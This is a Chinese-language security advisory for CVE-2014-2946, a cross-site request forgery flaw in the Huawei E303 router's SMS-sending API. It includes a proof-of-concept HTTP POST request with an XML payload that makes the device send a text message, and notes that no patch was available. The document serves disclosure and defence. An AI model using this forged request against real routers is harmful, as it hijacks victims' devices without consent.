Huawei E303路由器跨站请求伪造漏洞
发布日期:2014-05-30
更新日期:2014-06-03
受影响系统:Huawei E303
描述:
BUGTRAQ ID:
67747
CVE(CAN) ID:
CVE-2014-2946
Huawei E303路由器是无线宽带调制解调器。
Huawei E303 Router(固件版本CH2E303SM)在/api/sms/send-sms URL的实现上存在跨站请求伪造攻击,远程攻击者通过XML文档内的请求元素,利用此漏洞可劫持管理员身份验证请求。
<*来源:Benjamin Daniel Mussler
链接:
http://www.kb.cert.org/vuls/id/325636
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[Proof -of-concept HTTP POST request]:
POST /api/sms/send-sms HTTP/1.1
Host: hi.link
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,de-de;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer:
http://hi.link/
Connection: keep-alive
Content-Type: text/plain
Content-Length: 225
<?xml version="1.0"
encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>4422</Phone></Phones><Sca></Sca><Content>
Sample Text</Content><Length>0</Length><Reserved>1</Reserved><Date>2013-12-03
16:00:00</Date></request>
建议:
厂商补丁:
Huawei
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.huawei.com/enterprise/浏览次数:2664
严重程度:0(网友投票)
